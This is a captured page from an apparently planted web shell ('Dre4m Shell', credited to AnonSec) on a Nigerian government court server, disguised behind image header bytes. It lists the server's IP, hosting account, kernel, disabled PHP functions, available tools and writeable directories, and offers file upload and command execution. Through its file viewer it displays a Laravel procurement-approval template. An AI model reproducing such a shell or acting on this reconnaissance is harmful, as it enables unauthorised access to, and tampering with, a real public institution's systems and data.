ÿØÿàJFIFÿáExifMM*ÿÛC  Dre4m Was Here
Dre4m Shell
Server IP : 199.250.214.225  /  Your IP : 3.141.27.29
Web Server : Apache
System : Linux vps64074.inmotionhosting.com 3.10.0-1160.105.1.vz7.214.3 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : nicngo5 ( 1001)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /home/nicngo5/grp.nicn.gov.ng/storage/framework/views/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/nicngo5/grp.nicn.gov.ng/storage/framework/views/3b0ff3790dd7d86a40ed6f9f22be2f256d22532c.php
<form method="post" enctype="multipart/form-data">
<?php echo e(csrf_field()); ?>

<!-- The Modal -->
    <div id="myModalProcessP" class="modal">
        <!-- Modal content -->
        <div class="modal-content">
            <div align="left" class="modal-header">
                <b> <i class="fa fa-ticket"></i> SAY SOMETHING ABOUT THIS CONTRACT <i class="fa fa-exclamation"></i></b>
                <span class="pull-right"><i class="fa fa-user"></i><changeTextColor> <?php echo e(Session::get('UserRoleName')); ?> </changeTextColor></span>
            </div>
            <b><div align="center" class="text-uppercase" style="font-size: 15px; background: lightslategray; color: white;">
                    <span id="viewFileNo"></span> &nbsp; | &nbsp;
                    <i class="fa fa-copyright"></i> <span id="ShowNameHere"></span>
                </div>
            </b>
            <div align="center" class="modal-body">
                <span id="feedBack"></span>
            </div>
            <div class="col-md-12">
                <div class="form-group">

                    <div class="row">
                        <div class="col-sm-12">
                            <div class="text-success">
                                All Conversations <br />
                                <div class="text-primary" style="max-height: 100px; overflow-y: auto; font-size: 15px;">
                                    <span id="viewAllCommentP"></span>
                                </div>
                                <!--
                                <i><span class="text-success" id="getCommentPP"></span></i><br />
                                <i><span class="text-success" id="getCommentDP"></span></i><br /><br />
                                -->
                            </div><hr />
                        </div>
                    </div>
		    
		     <!--//Only show Amount and Liability taken-->
                    <div id="OtherUserModule" style="display: block; margin-bottom: 10px;">
                        <div class="row">
                            <div class="col-sm-6">
                                <label for="viewAmount">Contract Amount</label>
                                <div class="form-control" readonly ><span id="viewAmount"></span></div>
                                <br />
                            </div>
                            <div class="col-sm-6">
                                <label for="viewAmountLiability">Liability Amount</label>
                                <div class="form-control" readonly><span id="viewAmountLiability"></span></div>
                                <br />
                            </div>
                        </div>
                        <div class="row" id="showAmountAndLiabilityForOther">
                            <div class="col-sm-4">
                                <label for="viewAccountType">Account Type</label>
                                <div><input type="text" class="form-control" readonly id="viewAccountType" /></div>
                                <br />
                            </div>
                            <div class="col-sm-4">
                                <label for="viewAllocationType">Allocation Type</label>
                                <div><input type="text" class="form-control" readonly id="viewAllocationType" /></div>
                                <br />
                            </div>
                            <div class="col-sm-4">
                                <label for="viewEconomicCode">Economic Code</label>
                                <div><input type="text" class="form-control" readonly id="viewEconomicCode" /></div>
                                <br />
                            </div>
                        </div>
                    </div>
                    <!--//end view Amount and liability taken-->
                    
                    <!--//Only show module for HEC Take Liability-->
                    <div id="HECModule" style="display: none; margin-bottom: 10px;">
                        <div class="row">
                            <div class="col-sm-4">
                                <label for="amount">Contract Value</label>
                                <input type="text" id="editAmount" class="form-control" readonly />
                                <label class="text-default" style="font-weight: 100;"><small>Dont want to take liability check this <i class="fa fa-hand-o-right"></i></small></label>
                            </div>
                            <div class="col-sm-4">
                                <label for="laibility">Liability Amount</label>
                                <input type="text" id="editAmountLiability" required class="form-control" />
                                <input type="checkbox" id="takeLiability" value="1">
                                <label class="text-warning">I dont want to take liability</label>
                            </div>
                            <div class="col-sm-4">
                                <label for="laibility">Total Liability Taken</label>
                                <div class="form-control" id="unpaidBalanceLock" readonly></div>
                            </div>
                        </div>

                        <div class="row" id="liabilityParameter">
                            <div class="col-sm-3">
                                <label for="accountType">Account Type</label>
                                <select id="accountType" class="form-control">
                                    <option value="" selected>--Select--</option>
                                    <?php $__empty_1 = true; $__currentLoopData = $contractType; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $listCT): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); $__empty_1 = false; ?>
                                        <option value="<?php echo e($listCT->ID); ?>"><?php echo e($listCT->contractType); ?></option>
                                    <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); if ($__empty_1): ?>
                                        <option value="" selected>--Select--</option>
                                    <?php endif; ?>
                                </select><div class="form-control" id="accountTypeRead" style="display: none"></div>
                            </div>
                            <div class="col-sm-4">
                                <label for="allocationType">Allocation Type</label>
                                <select id="allocationType" class="getEconomicCode form-control" required>
                                    <option value="" selected>--Select--</option>
                                    <?php $__empty_1 = true; $__currentLoopData = $allocationType; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $listAT): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); $__empty_1 = false; ?>
                                        <option value="<?php echo e($listAT->ID); ?>"><?php echo e($listAT->allocation); ?></option>
                                    <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); if ($__empty_1): ?>
                                        <option value="" selected>--Select--</option>
                                    <?php endif; ?>
                                </select><div class="form-control" id="allocationTypeRead" style="display: none"></div>
                            </div>
                            <div class="col-sm-5">
                                <label for="economicCode">E-Code <b><span style="color: green; overflow-x: auto" id="getEconBal"></span></b></label>
                                <select id="economicCode" class="form-control" required>
                                    <option value="" selected>--Select--</option>
                                </select><div class="form-control" id="economicCodeRead" style="display: none"></div>
                            </div>
                        </div>

                    </div>
                    <!--//End Show module-->

                    <div class="row">
                        <div class="col-sm-12">
                            <label for="amount">Comment</label>
                            <textarea id="newComment" class="form-control" required placeholder="Say something..."></textarea>
                        </div>
                        <div class="col-sm-12">
                            <div><span id="getCommentD"></span></div>
                        </div>
                        <div class="col-sm-12">
                            <br />
                            <label for="amount">Push To</label>
                            <select class="form-control" id="pushTo" name="pushToP">
                                <option value="">--Select--</option>
                                <?php $__empty_1 = true; $__currentLoopData = $getTraackAction; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $listPush): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); $__empty_1 = false; ?>
                                    <option value="<?php echo e($listPush->code); ?>"><?php echo e($listPush->description); ?></option>
                                <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); if ($__empty_1): ?>
                                    <option value="">--Select--</option>
                                <?php endif; ?>
                            </select>
                        </div>
                    </div>
                </div>
                <hr/>
            </div>
            <div class="row">
                <?php if(Session::get('currentUser') == "ES"): ?>
                    <div align="right" class="col-sm-4">
                        <button type="button" id="btnReturnProcessES" class="btn btn-primary btn-sm"><i class="fa fa-backward"></i> Return (Not Approve Yet) </button>
                    </div>
                    <div align="right" class="col-sm-4">
                        <button type="button" id="btnSubmitProcessPush" class="btn btn-success btn-sm"><i class="fa fa-save"></i> Final Approval </button>
                    </div>
                    <div align="center" class="col-sm-4">
                        <button type="button" id="btnProcessCloseP" class="btn btn-default btn-sm"> <i class="fa fa-warning"></i> Cancel</button>
                    </div>
                <?php else: ?>
                    <div align="center" class="col-sm-6">
                        <button type="button" id="btnSubmitProcessPush" class="btn btn-success btn-sm"><i class="fa fa-save"></i> Push to the next office </button>
                    </div>
                    <div align="center" class="col-sm-6">
                        <button type="button" id="btnProcessCloseP" class="btn btn-default btn-sm"> <i class="fa fa-warning"></i> Cancel</button>
                    </div>
                <?php endif; ?>
            </div>

        </div>

    </div>
</form><?php /**PATH /home/nicngo5/grp.nicn.gov.ng/resources/views/njc/modalBodyProcurement.blade.php ENDPATH**/ ?>

Anon7 - 2022
AnonSec Team